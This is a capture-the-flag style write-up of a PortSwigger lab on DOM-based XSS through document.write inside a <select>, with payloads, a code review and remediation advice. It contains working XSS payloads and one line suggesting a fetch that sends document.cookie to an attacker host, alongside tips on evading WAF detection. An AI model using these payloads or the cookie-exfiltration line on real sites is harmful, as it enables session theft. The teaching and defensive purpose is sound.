Web Security Academy: DOM XSS in document.write Inside a <select>

· falasi.net


Prerequisites #

This lab does not require an intercepting proxy. Everything in this write-up can be reproduced with a browser and its built-in developer tools: the Sources panel for locating the sink, the address bar for delivering the payload, and the Console or rendered page for confirming execution.

Summary #

This PortSwigger lab presents a classic DOM-based XSS vulnerability: a value taken directly from the query string is concatenated into a call to document.write, with no encoding or sanitisation in between. The only complication is that the injection point sits inside a <select> element, which is one of the more restrictive parsing contexts in HTML. Most tags placed directly inside a <select> are silently discarded by the parser, so a payload generally has to break out of that context before introducing executable content.

This write-up walks through identifying the sink, confirming the injection context, building a working payload, and, more importantly, examining what the underlying defect is and how it should actually be fixed.

Step 1: Locating the sink #

Opening DevTools and searching the Sources panel for document.write returns a single hit on the product page:

<form id="stockCheckForm" action="/product/stock" method="POST">
    <input required type="hidden" name="productId" value="1">
    <script>
        var stores = ["London","Paris","Milan"];
        var store = (new URLSearchParams(window.location.search)).get('storeId');
        document.write('<select name="storeId">');
        if(store) {
            document.write('<option selected>'+store+'</option>');
        }
        for(var i=0;i<stores.length;i++) {
            if(stores[i] === store) {
                continue;
            }
            document.write('<option>'+stores[i]+'</option>');
        }
        document.write('</select>');
    </script>
    <button type="submit" class="button">Check stock</button>
</form>

The store variable is read from the query string via URLSearchParams and is therefore fully attacker-controlled. It is then concatenated into the string '<option selected>'+store+'</option>' and passed to document.write, which parses its argument as HTML and inserts it into the live document. Any character supplied in the storeId parameter is treated as markup at the point of insertion.

The injection lands inside an <option> element, which itself sits inside a <select>. That nesting is significant when it comes to choosing a payload.
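
The source-to-sink flow can be reproduced outside the browser. The following is a minimal sketch, assuming a hypothetical helper named buildOptionMarkup that mirrors the lab's concatenation but returns the string instead of passing it to document.write:

```javascript
// Hypothetical helper (not part of the lab): same concatenation as the
// vulnerable code, but the result is returned rather than written.
function buildOptionMarkup(search) {
  // URLSearchParams percent-decodes the value, so encoded angle brackets
  // come back as literal < and > characters.
  const store = new URLSearchParams(search).get('storeId');
  return store ? '<option selected>' + store + '</option>' : '';
}

console.log(buildOptionMarkup('?productId=1&storeId=asdf'));
console.log(buildOptionMarkup('?productId=1&storeId=%3Cb%3Ebold%3C%2Fb%3E'));
```

The second call yields a string containing a literal <b> element, which is exactly what document.write would then hand to the HTML parser.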

Step 2: Confirming the context #

A useful first step in any injection scenario is to send a benign value and observe how it appears in the rendered DOM. Submitting:

?productId=1&storeId=asdf

produces:

<select name="storeId">
    <option selected>asdf</option>
    <option>London</option>
    <option>Paris</option>
    <option>Milan</option>
</select>

The value asdf appears verbatim as the text content of the first <option>, with no encoding applied. That confirms the sink is reachable and that the input is being treated as raw markup rather than text.

The complication, as mentioned, is that <select> is a hostile parsing context. The HTML parser has traditionally permitted only a small set of element types inside a <select> (chiefly <option> and <optgroup>) and silently discards most others. A payload such as <img src=1 onerror=alert(1)> placed inside an <option> will not fire, because the parser drops the <img> start tag in that context. <script> is a notable exception: the parsing rules for <select> explicitly let it through. For any other element, the payload must first close the surrounding <select> and only then introduce content that the parser will treat as executable.

Step 3: Breaking out of the <select> #

There are two payload shapes that work cleanly here.

The first closes the surrounding <select>, then introduces an <img> element with an onerror handler:

"></select><img src=1 onerror=alert(1)>

URL-encoded for transport in the query string:

?productId=1&storeId=%22%3E%3C%2Fselect%3E%3Cimg%20src%3D1%20onerror%3Dalert(1)%3E

The leading "> is not strictly needed here: the injection point is the text content of the <option>, not an attribute value, so those two characters are simply rendered as text. </select> exits the restrictive parsing context, and the <img> element is then parsed normally. Because src=1 does not resolve to a valid image, the browser fires the onerror handler and alert(1) executes.
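
The encoded form of this payload can be reproduced with the standard encodeURIComponent function. This is a small sketch that builds the query string and confirms that URLSearchParams decodes it back to the original payload; the variable names are illustrative only:

```javascript
const payload = '"></select><img src=1 onerror=alert(1)>';

// encodeURIComponent leaves ( and ) untouched, which is why they appear
// unencoded in the final URL.
const query = '?productId=1&storeId=' + encodeURIComponent(payload);
console.log(query);

// The page reads the value back through URLSearchParams, which decodes it.
const decoded = new URLSearchParams(query).get('storeId');
console.log(decoded === payload);
```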

The second payload, the one I used to solve the lab, is more elaborate. It is worth examining because it does not close the <select> at all: <script> is one of the few elements the parser still accepts inside a <select>, so it is created and executed in place:

<script>eval(myUndefVar);var inject="INJECTION_STARTS_HERE";var myUndefVar;alert(1);//";</script>

URL-encoded:

?productId=1&storeId=%3Cscript%3Eeval(myUndefVar);var%20inject=%22INJECTION_STARTS_HERE%22;var%20myUndefVar;alert(1);//%22;%3C/script%3E

The eval(myUndefVar) call and the surrounding variable declarations are largely decorative: the var myUndefVar declaration is hoisted, so eval receives undefined and simply returns it without throwing, and alert(1) runs regardless. A bare <script>alert(1)</script> works equally well in this position. The more elaborate version is useful as a teaching example, because it shows unambiguously that the injection is running in an ordinary JavaScript execution context, hoisting included, even though it was injected into a <select>.
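
The behaviour of those statements can be checked outside the browser. The sketch below wraps the payload's body in a hypothetical function, runPayloadBody, and replaces alert with a stub so that it runs under Node.js:

```javascript
// Hypothetical wrapper: the statements are the payload's, in the same order.
function runPayloadBody(alertStub) {
  // var myUndefVar is hoisted to the top of the function, so this line is
  // eval(undefined), which returns undefined instead of throwing.
  const evalResult = eval(myUndefVar);
  var inject = "INJECTION_STARTS_HERE";
  var myUndefVar;
  alertStub(1); // stands in for alert(1)
  return evalResult;
}

const calls = [];
const result = runPayloadBody((value) => calls.push(value));
console.log(result, calls);
```

The stub is called once with the value 1, and the value returned by eval is undefined.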

Either payload triggers the alert dialog on page load, which is sufficient to solve the lab.

Step 4: Confirming execution #

When the page loads with the payload in place, the alert(1) dialog appears as expected. A useful secondary observation with the <script> payload is that the page also stops rendering at the injection point. The most likely explanation is that the injected script runs synchronously in the middle of the document.write sequence, and alert is modal: until the dialog is dismissed, the legitimate script cannot continue, so the remaining options and the original closing </select> have not yet been written. The visible breakage is, in itself, useful confirmation: the payload has not merely been deposited in the DOM, it has executed at the point where it was parsed.

A note on payload choice in less forgiving environments: alert( is one of the most heavily fingerprinted tokens in WAF rule sets. For self-confirmation in a real engagement, console.log(1) is far less conspicuous, and a request such as fetch('//attacker.tld/?c='+document.cookie) provides a more meaningful proof of impact.

Why it works #

The <select> context is incidental. The underlying defect is a single architectural mistake: an attacker-controlled source (window.location.search) flows directly into a markup-interpreting sink (document.write) with no encoding applied along the way.

document.write is one of the more dangerous sinks available in client-side JavaScript precisely because it parses its argument as HTML and splices the result into the live document. Any data that flows into it must be HTML-encoded with at least the same care one would apply to a server-side template. The lab code does no encoding whatsoever: no encodeURIComponent, no manual replacement of <, > or quote characters, no detour through a safer DOM API such as textContent. The query string is concatenated raw into the markup and handed to the parser.

Within that context, the <select> element is best understood as an inconvenience for the attacker rather than a defence. It restricts the shape of the payload but does not prevent injection. Once the parsing rules at the injection point are understood, breaking out is routine HTML.

Code review perspective #

The pattern to recognise here is straightforward: a controllable source, a markup sink, and nothing meaningful between them. The lab code is a textbook example.

The vulnerable pattern #

<script>
    var store = (new URLSearchParams(window.location.search)).get('storeId');
    document.write('<option selected>'+store+'</option>');
</script>

Query-string input flows into document.write via simple string concatenation. There is no defence at any layer.

A common but ineffective fix #

A reviewer encountering this code might be tempted to add a denylist for the most obvious payload:

<script>
    var store = (new URLSearchParams(window.location.search)).get('storeId');
    if (store && store.toLowerCase().indexOf('<script') === -1) {
        document.write('<option selected>'+store+'</option>');
    }
</script>

This appears to address the issue, but it does not. Payloads built on event handlers or javascript: URLs still work:

"></select><img src=1 onerror=alert(1)>
"></select><svg onload=alert(1)>
"></select><iframe src=javascript:alert(1)>

Denylist approaches to XSS tend to fail at the first attribute-based payload, because the underlying problem has not changed: the data is still being parsed as HTML, and HTML offers a wide range of script-execution vectors that do not involve the literal token <script.
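
The gap is easy to demonstrate. The sketch below extracts the denylist condition into a hypothetical function, passesDenylist, and runs it against a bare <script> payload and the three payloads listed above:

```javascript
// Same condition as the "fixed" code: true means the value would be written.
function passesDenylist(store) {
  return Boolean(store) && store.toLowerCase().indexOf('<script') === -1;
}

const candidates = [
  '<script>alert(1)</script>',
  '"></select><img src=1 onerror=alert(1)>',
  '"></select><svg onload=alert(1)>',
  '"></select><iframe src=javascript:alert(1)>',
];

for (const candidate of candidates) {
  console.log(passesDenylist(candidate) ? 'written:' : 'blocked:', candidate);
}
```

Only the first candidate is blocked; the other three pass the check and reach document.write unchanged.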

A better fix: encode at the sink #

Encoding the value before insertion does genuinely close the bug:

<script>
    // Escape the characters that are significant in HTML text and attribute values.
    function htmlEncode(s) {
        return String(s).replace(/&/g, '&amp;')   // ampersand first, to avoid double-encoding
                .replace(/</g, '&lt;')
                .replace(/>/g, '&gt;')
                .replace(/"/g, '&quot;')
                .replace(/'/g, '&#39;');
    }

    var store = (new URLSearchParams(window.location.search)).get('storeId');
    if (store) {   // get() returns null when storeId is absent
        document.write('<option selected>'+htmlEncode(store)+'</option>');
    }
</script>

After encoding, < becomes &lt;, the parser treats the value as text rather than markup, and the injection is closed off. The drawback is operational: every developer who subsequently touches this code must remember to call htmlEncode, with the correct encoding for the context, every time. A single forgotten call reintroduces the vulnerability. Encoding at the sink works, but it relies on consistent discipline indefinitely.
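
To see the effect on the lab payload, the encoder can be run on its own. This sketch uses the same five replacements as the fix above (the String() coercion is an added assumption, so that a null input does not throw):

```javascript
function htmlEncode(s) {
  return String(s)
    .replace(/&/g, '&amp;') // ampersand first, to avoid double-encoding
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

const encoded = htmlEncode('"></select><img src=1 onerror=alert(1)>');
console.log('<option selected>' + encoded + '</option>');
```

The resulting string contains no < or > characters from the input, so the parser has nothing to interpret as a tag and the whole payload becomes the visible text of the option.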

The preferred fix: avoid the markup sink entirely #

The most robust fix is to remove the markup sink from the design altogether and build the DOM through the standard APIs:

<select name="storeId" id="storeSelect"></select>
<script>
    var stores = ["London", "Paris", "Milan"];
    var store = (new URLSearchParams(window.location.search)).get('storeId');
    var select = document.getElementById('storeSelect');

    if (store) {
        var selected = document.createElement('option');
        selected.textContent = store;
        selected.selected = true;
        select.appendChild(selected);
    }

    stores.forEach(function (name) {
        if (name === store) return;
        var opt = document.createElement('option');
        opt.textContent = name;
        select.appendChild(opt);
    });
</script>

textContent assigns its value as text, and cannot introduce tags or attributes regardless of the input. The <select> element exists as static markup, the options are constructed through the DOM API, and there is no markup sink for an attacker to reach. The vulnerability is not being filtered out; it has been designed out of the code.

For situations that genuinely require dynamic HTML, a templating library with contextual auto-escaping enabled by default is the appropriate tool. Hand-rolled string concatenation into document.write, innerHTML, or outerHTML should be regarded as a code smell on sight.

Impact #

DOM-based XSS in an authenticated application allows an attacker to execute arbitrary JavaScript in the victim's browser, within the security context of the application's origin. On a production e-commerce site with this defect, the practical consequences include:

Delivery requires only a crafted URL, and the surrounding feature makes social engineering particularly straightforward: this is a stock-checker on a product page, so a message along the lines of "Could you check whether this is in stock at your local store?" with a link attached is plausible in a way that a generic phishing URL is not. Both payload shapes shown above execute on page load, with no further interaction beyond the initial click on the link.

Remediation #

The root cause is unchanged across all of the preceding analysis: a controllable source flows into a markup sink with no encoding. The available fixes, in order of preference, are:

  1. Eliminate the markup sink. Replace calls to document.write, innerHTML, and outerHTML with DOM construction via createElement, and assign user-supplied values through textContent or specific attribute setters. This removes the entire class of vulnerability rather than mitigating individual instances.
  2. Use a templating library with contextual auto-escaping. Most modern frameworks provide this by default, and the dangerous opt-outs (such as React's dangerouslySetInnerHTML) are easy to identify in code review.
  3. If a markup sink cannot be avoided, encode at the point of insertion using the appropriate encoding for the context. Wrong-context encoding is itself a defect, so this approach should be treated as a last resort.
  4. Add a strict Content Security Policy as defence in depth. A CSP that disallows inline scripts and untrusted sources will not prevent the injection from reaching the DOM, but it can neutralise most practical payload shapes. CSP is mitigation, not a fix; the underlying defect still needs to be addressed.
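
As an illustration of item 4, the sketch below assembles one possible strict policy. The helper buildCspHeader and the specific directive values are assumptions chosen for the example, not something the lab prescribes:

```javascript
// Hypothetical helper: joins directive names and source lists into a header value.
function buildCspHeader(directives) {
  return Object.entries(directives)
    .map(([name, sources]) => `${name} ${sources.join(' ')}`)
    .join('; ');
}

const policy = buildCspHeader({
  'default-src': ["'self'"],
  // No 'unsafe-inline': inline <script> blocks and onerror= handlers are refused.
  'script-src': ["'self'"],
  'object-src': ["'none'"],
  'base-uri': ["'none'"],
});

console.log('Content-Security-Policy: ' + policy);
```

A policy like this would also block the page's own inline stock-checker script, so the legitimate code would have to move into an external file served from the same origin before the header could be enabled.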

Takeaway #

DOM-based XSS is found primarily by reading code rather than by spraying payloads. The methodology is straightforward: enumerate sinks, trace each one back to its sources, render a benign value to confirm the injection context, and only then construct a payload that fits the parser's rules at that specific point.
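
The first step, enumerating sinks, can be partly automated. The following is a rough sketch, assuming a hypothetical findSinks helper and a deliberately short list of sink names; a real review would cover more sinks and still needs a human to trace each hit back to its source:

```javascript
// A small, non-exhaustive set of markup sinks to flag for manual review.
const SINK_PATTERN = /\b(document\.write(?:ln)?|innerHTML|outerHTML|insertAdjacentHTML)\b/g;

// Returns one entry per sink occurrence, with a 1-based line number.
function findSinks(source) {
  return source.split('\n').flatMap((text, index) =>
    [...text.matchAll(SINK_PATTERN)].map((match) => ({
      line: index + 1,
      sink: match[1],
      text: text.trim(),
    }))
  );
}

const sample = [
  "var store = (new URLSearchParams(window.location.search)).get('storeId');",
  "document.write('<select name=\"storeId\">');",
  "if (store) {",
  "    document.write('<option selected>'+store+'</option>');",
  "}",
].join('\n');

for (const hit of findSinks(sample)) {
  console.log(`${hit.line}: ${hit.sink}  ${hit.text}`);
}
```

Run against this excerpt of the lab code, the scan flags both document.write calls; only the second one concatenates the attacker-controlled store value, which is the distinction the manual tracing step exists to make.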

This lab is a useful illustration of why the last step matters. An <img> element placed directly inside a <select> is silently discarded; the same <img> element, introduced after closing the <select>, fires its onerror handler without difficulty. The bug is the same in either case. Recognising the difference between a payload that should work in principle and one that will work in practice is, more often than not, where the actual work happens.

Appendix #

PortSwigger Cross-site scripting (XSS) cheat sheet
